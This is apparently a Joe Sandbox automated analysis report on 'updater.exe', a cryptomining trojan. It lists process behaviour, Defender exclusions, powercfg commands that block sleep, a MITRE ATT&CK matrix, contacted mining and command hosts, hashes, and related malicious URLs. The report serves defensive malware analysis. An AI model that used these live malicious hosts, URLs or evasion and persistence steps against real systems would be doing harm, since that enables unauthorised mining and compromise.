          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Modifies power options to not sleep / hibernate
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation          		11
          Windows Service          		11
          Windows Service          		1
          Masquerading          		OS Credential Dumping211
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Service Execution          		1
          DLL Side-Loading          		111
          Process Injection          		1
          Disable or Modify Tools          		LSASS Memory12
          Virtualization/Sandbox Evasion          		Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		12
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture2
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets12
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
          File Deletion          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526527 Sample: updater.exe Startdate: 06/10/2024 Architecture: WINDOWS Score: 100 54 minerchenzhi888.top 2->54 56 auto.c3pool.org 2->56 62 Multi AV Scanner detection for domain / URL 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 7 other signatures 2->68 8 updater.exe 1 2->8         started        12 updater.exe 1 3 2->12         started        signatures3 process4 file5 50 C:\Windows\Temp\zlvyxohjpfnw.sys, PE32+ 8->50 dropped 70 Multi AV Scanner detection for dropped file 8->70 72 Modifies the context of a thread in another process (thread injection) 8->72 74 Adds a directory exclusion to Windows Defender 8->74 76 Sample is not signed and drops a device driver 8->76 14 svchost.exe 8->14         started        18 powershell.exe 27 8->18         started        20 cmd.exe 8->20         started        28 10 other processes 8->28 52 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 12->52 dropped 78 Self deletion via cmd or bat file 12->78 80 Uses powercfg.exe to modify the power settings 12->80 82 Modifies power options to not sleep / hibernate 12->82 22 powershell.exe 27 12->22         started        24 cmd.exe 1 12->24         started        26 cmd.exe 1 12->26         started        30 13 other processes 12->30 signatures6 process7 dnsIp8 58 5.161.70.189, 23333, 49757 HETZNER-ASDE Germany 14->58 60 minerchenzhi888.top 172.67.162.29, 49758, 49760, 49761 CLOUDFLARENETUS United States 14->60 84 Query firmware table information (likely to detect VMs) 14->84 86 Found strings related to Crypto-Mining 14->86 32 conhost.exe 18->32         started        42 2 other processes 20->42 88 Loading BitLocker PowerShell Module 22->88 34 conhost.exe 22->34         started        44 2 other processes 24->44 36 conhost.exe 26->36         started        38 wusa.exe 26->38         started        46 9 other processes 28->46 40 conhost.exe 30->40         started        48 12 other processes 30->48 signatures9 90 Detected Stratum mining protocol 58->90 process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          updater.exe96%ReversingLabsWin64.Trojan.MintZard
          updater.exe82%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\ProgramData\Google\Chrome\updater.exe96%ReversingLabsWin64.Trojan.MintZard
          C:\ProgramData\Google\Chrome\updater.exe82%VirustotalBrowse
          C:\Windows\Temp\zlvyxohjpfnw.sys5%ReversingLabs
          C:\Windows\Temp\zlvyxohjpfnw.sys4%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          auto.c3pool.org6%VirustotalBrowse
          minerchenzhi888.top12%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://minerchenzhi888.top/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=9%VirustotalBrowse
          https://xmrig.com/docs/algorithms2%VirustotalBrowse
          http://minerchenzhi888.top/api/endpoint.php9%VirustotalBrowse
          http://minerchenzhi888.top/api/endpoint.phphlhwzjwrxrewbblx9%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          auto.c3pool.org
          		5.161.65.155
          		truefalseunknown
          minerchenzhi888.top
          		172.67.162.29
          		truefalseunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://minerchenzhi888.top/api/endpoint.phpfalseunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://minerchenzhi888.top/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=svchost.exe, 0000003E.00000002.346493278590.00000254DD65F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          http://minerchenzhi888.top/api/endpoint.phpTsvchost.exe, 0000003E.00000002.346493622809.00000254DD6F2000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://172.94.1qsvchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
              		unknown
              http://minerchenzhi888.top/api/endpoint.phphlhwzjwrxrewbblxsvchost.exe, 0000003E.00000003.345290459404.00000254DD671000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://xmrig.com/docs/algorithmssvchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalseunknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              5.161.70.189
              		unknownGermany
              		24940HETZNER-ASDEtrue
              172.67.162.29
              		minerchenzhi888.topUnited States
              		13335CLOUDFLARENETUSfalse

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1526527
              Start date and time:2024-10-06 01:44:02 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 12s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Number of analysed new started processes analysed:63
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:updater.exe
              Detection:MAL
              Classification:mal100.spyw.evad.mine.winEXE@93/12@2/2
              EGA Information:
              • Successful, ratio: 75%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Execution Graph export aborted for target svchost.exe, PID 6248 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              19:46:09API Interceptor1x Sleep call for process: updater.exe modified
              19:46:10API Interceptor24x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              5.161.70.189LisectAVT_2403002B_48.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                4xHN38uqxB.exeGet hashmaliciousDoublePulsar, ETERNALBLUE, XmrigBrowse
                  logor.elfGet hashmaliciousXmrigBrowse
                    172.67.162.29http://adserver.tunisienumerique.com/www/delivery/ajs.php?zoneid=23&cb=97486157595&charset=UTF-8&loc=http://www.tunisie.gov.tn/&referer=http://consulat-tunisie.ca/Get hashmaliciousUnknownBrowse
                    • adserver.tunisienumerique.com/www/delivery/ajs.php?zoneid=23&cb=97486157595&charset=UTF-8&loc=http://www.tunisie.gov.tn/&referer=http://consulat-tunisie.ca/

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    auto.c3pool.orgLisectAVT_2403002B_48.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                    • 5.75.158.61
                    LisectAVT_2403002B_55.exeGet hashmaliciousXmrigBrowse
                    • 5.75.158.61
                    LisectAVT_2403002A_416.exeGet hashmaliciousXmrigBrowse
                    • 5.75.158.61
                    o00DuIdf3j.exeGet hashmaliciousXmrigBrowse
                    • 5.75.158.61
                    o00DuIdf3j.exeGet hashmaliciousXmrigBrowse
                    • 5.75.158.61
                    xB6r0wPRyb.exeGet hashmaliciousXmrigBrowse
                    • 5.75.158.61
                    K4gsPJGEi4.exeGet hashmaliciousXmrigBrowse
                    • 5.75.158.61
                    x00zm3KVwb.exeGet hashmaliciousXmrigBrowse
                    • 88.198.117.174
                    4xHN38uqxB.exeGet hashmaliciousDoublePulsar, ETERNALBLUE, XmrigBrowse
                    • 5.161.70.189
                    UO2z4n1Sxx.exeGet hashmaliciousUnknownBrowse
                    • 88.198.117.174

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    HETZNER-ASDE81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                    • 136.243.190.131
                    bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                    • 49.12.197.9
                    https://s3.amazonaws.com/r3e1272/Rco.html#4eyOul3510eTKK19nejdimaazo189TBUDIERNFIMTFBQ264510CRSG907S11Get hashmaliciousPhisherBrowse
                    • 5.161.250.225
                    w4DO1Z18yg.wsfGet hashmaliciousSmokeLoaderBrowse
                    • 188.40.141.211
                    UkHkCa3IYV.wsfGet hashmaliciousSmokeLoaderBrowse
                    • 188.40.141.211
                    3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                    • 188.40.141.211
                    RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                    • 188.40.141.211
                    https://indexconectada.net.br/Get hashmaliciousUnknownBrowse
                    • 85.10.195.17
                    https://iasitvlife.roGet hashmaliciousUnknownBrowse
                    • 49.12.228.110
                    https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/Get hashmaliciousHTMLPhisherBrowse
                    • 49.12.228.110
                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                    • 172.67.151.30
                    http://www.grandsignatureyercaud.com/Get hashmaliciousUnknownBrowse
                    • 104.21.51.144
                    http://www.nesianlife.com/Get hashmaliciousUnknownBrowse
                    • 104.18.39.195
                    https://daf2019.com/8/02Get hashmaliciousUnknownBrowse
                    • 172.65.190.172
                    https://wtm.entree-plat-dessert.com/r/eNqtj01vgkAQhn8NvVXcL1gOplGBqgUraGrx0gC7iquAwqLVX99Ve2iT9ubMHN6ZyeSd56hbEBqA6oCbGCPCAQM0phBhC7IUJHBp4phQznVAEdGxSfQEotRYwjYyKWMGQTFoQwMCK4mxCmupt1U2+lPTyaTc1RrqatBVxVmLF7Li/HG3jeUj43XNK9lKy/yyRy7nGrJv32jQUHf2UdkpuVfSXC6C9bAo5mAqNzN3IcLBoB0KacxNSptTOZpGXmrlfX/q7OFn8n7yUEaceiRW/VPoRudGgwT2crMOCCGr4Xl86V1zIgp5juC1sfd2lCXe8KU7Pryth8GiG+RWUUQEilF2skVEzh6ejS3PwcBeGTPfB5zNXTo5YPHsrF+vDscJq+zellaxHwrkrW62I0kdAcp+Qvz5oCw3ySY+bGyF1sj8oy6bKr2wF9vvSc7ZusnVJOMx49UDSzt34P9N/4P9DuR/cP9H/QVY0sGGGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    https://blmphilly.com/Get hashmaliciousUnknownBrowse
                    • 172.66.0.227
                    https://wtm.entree-plat-dessert.com/r/eNpVUF2v2jAM/TXdW29J0vTj4WoCCgMGd3xprLygNHFLS5OWNoELv35hmjTNsuzj42Nb8t2LMQ5Q5CEIfZ9QQAJFLMLEj7HgKMN56DMaAXgoItTzQ+plmPAgxwMSRkIElDA0wAFGccZ8a3Hu+R5CXuN9Ne9nrdveIUMHT60zrs1bDlLCC0Fdw1veWZ6bsi8VWNQBB62hdwW4/9iiY7pUf7jGdMVL4Zpad8wtbC2ZEm7N3L+zrm6MjX0p2xrcUgCz6Wpeoka50GtXNTLrwHy6GIVx5IcOmRotT73dxcEhyR1q3shSFaB0B9DWTAvoe+i0gwMmW4eMXnoJojTS6nnL/2twC1lZKNtqZXPKGT+xTpe8hi+Cv4f5cVPOlTqgnb7sp8dqO5sNtpUODmEUmUez2KVLHsvxaje54s/s12NJznTSL6pi/NhO06dx8EiG/YZSWsyfH/Y94bpS+pliC5Nrkp6z5fz78OP2s5xvjsONjJVKKa4W50dSpfS59Pcf8XLio6QI9qsVAnGYRuubX32blD/s7vtadMmojjq22lZkWbzOLXQ0qVAzzujqMGuaS3Zht0vyG3pQvJg=Get hashmaliciousUnknownBrowse
                    • 172.67.186.254
                    https://wtm.entree-plat-dessert.com/r/eNpNj1uTojAQhX8N+6aYG4SHqS0VWHXB9Vbj4stUCAGDXJyQ6OKv38zbdPXDV+d096l+ugGEHqAuED7GiAhQAMooRDiABQc5LH3MCBXCBRQRF/vEzSHiXglnyKdF4RHEwAx6EAQ5w7aC0vVcQNze/WnerlrfBwfNHRjbZlybacuUFLxhUolpqazKjRxkJyxpprSYMDPJVc/7Rk4GZriYcKPUOOFWcuASYD/wCJyy4e6gmOmPVhTStA4KRaE/bIIDPdZab2E9bonJqrPus+F925pGy+8DQ28UF1/LnVZC3BumCzEMQukfBX/zy8terrvuDI76doov9WG1mh1q7Z19Ss3Yb45ZwoN2mR6jT/gv/zsm6EqiYVNXy/EQZy/jwEXrD3tCSLV+be2H/q7u9CuDFsPPMLvmyfr3fPt4l+v9Zb5vg67LCKw31zGsM/JK8GkbJBEGYeWd0hSI4hzT3QPXvyL5x95+7goVLhqqWHqoUVJ9xW00jWrQL3OSnld9f8tv7HEL/wMooptNGet hashmaliciousUnknownBrowse
                    • 104.18.38.76
                    https://wtm.entree-plat-dessert.com/r/eNqtj09vgkAQxT8NvdV1/8FyMI0KVC1YQVOLlwbYRV0FFBatfvqi9tAm7c3JHOa9yeTN7whMhHTIABQGIZgKyCGLGMLERDyBMUoNElEmBIAMU0AMCmKEEz1FbWwwznWKI9hGOoJmHJGmzBRAAjAGNXiqOyuldpWGuxpymha8JXJVCvG420bqkYuqEqVqJUV22WNHCA1bt380pDd31rEJbMZ9Mxrpwl8P83wOp2ozcxYyGAzagVT63GCsPhWjaegmZtb3pvYefcbvJxevqF2N5LJ/CpzwXGuIol5mVD6ldDk8jy/aMSYyV+cQXYW1t8JV7A5fuuPD23roL7p+ZuZ5SJEcrU6WDOnZJbOx6doEWkt95nlQ8LnDJgcin+316zXhOOGl1duyMvICid3lLXakmC1h0Y+pNx8UxSbeRIeN1aDVKvuoirpMLuz59tvJBF/XWeOkRaFE+cCTzh34f9P/YL8D+R/c/1F/AYULwhc=Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    https://wtm.entree-plat-dessert.com/r/eNpVUF2v2jAM/TXdW29J2rTpw9UEFAYM7vjSWHlBaeqWlCYtbQIXfv3CNGlabNnHx8e2lLsXYxwi6iGIgsAngHJEGcV+EOOcowwXUcAIBfAQ9YkXRMTLsM/DAg/8iOZ5SHyGBjjEKM5YYF9ceMha430172et297xhw6eWmdcm7cCpIQXgrqGt6KzPDeiFwos6oCD1tC7Obj/2LJjWqg/XGO68qVwTa075pa2lkzlbs3cv7OuboyNvZBtDa7Igdl0NS9Ro1zotasamXVgPl2MopgGkeNPjZan3u7i4PjJHWreSKFKULoDaGumc+h76LSDQyZbxx+99BJyYaTV85b/1+AWMlEq22plcyoYP7FOC17Dl5y/R8VxI+ZKHdBOX/bTY7WdzQbbSoeHiFLzaBa7dMljOV7tJlf8mf16LP0zmfSLqhw/ttP0aRw8klG/IYSU8+eH/Z5oXSn9TLGFyTVJz9ly/n34cfsp5pvjcCNjpVKCq8X5kVQpeS6D/Ue8nAQoKcP9aoUgP0zp+hZU3ybih919X+ddMqppx1bbyl+Wr3MLTScVasYZWR1mTXPJLux2SX4DAm28ZA==Get hashmaliciousUnknownBrowse
                    • 104.21.19.169

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Windows\Temp\zlvyxohjpfnw.sys7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                      LnK0dS8jcA.exeGet hashmaliciousXmrigBrowse
                        file.exeGet hashmaliciousXmrigBrowse
                          SecuriteInfo.com.Win64.Evo-gen.13032.15171.exeGet hashmaliciousXmrigBrowse
                            file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                              S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse
                                  file.exeGet hashmaliciousXmrigBrowse
                                    file.exeGet hashmaliciousXmrigBrowse
                                      System.exeGet hashmaliciousFlesh Stealer, XmrigBrowse

                                        Created / dropped Files

                                        C:\ProgramData\Google\Chrome\updater.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\updater.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):2728960
                                        Entropy (8bit):6.5920384034620385
                                        Encrypted:false
                                        SSDEEP:49152:tgmXm6CldAIFE+WUQPiOpDrx04lD3x/7Mzub42MlGjGudSLfO:tjXm6CA4VtOpp04l97MqbYlGSawf
                                        MD5:A0C374F31894AA332D158F56608C89C3
                                        SHA1:0236445A761FCA6DCDA1B9014BEB78198DFAE9F8
                                        SHA-256:CE7CA5446E66CE1E9190E16922FA33FEBB0789F27561AA820D1D1BF14C86CFE1
                                        SHA-512:5596F10E8A0B7233B8A3AC76C3E3827E58F1213B2B54349D4F89CCB34D05032806EE6FE57CBDD8709898D53088F87404252D847BAAE0311693A451108519770B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 96%
                                        • Antivirus: Virustotal, Detection: 82%, Browse
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........).....@..........@..............................*...........`.....................................................<.....(. .....(...............*.x...............................(.......8...........0...X............................text............................... ..`.rdata... ......."..................@..@.data...P.'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc... .....(.......(.............@..@.reloc..x.....*.......).............@..B........................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tnuojnn.uxa.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
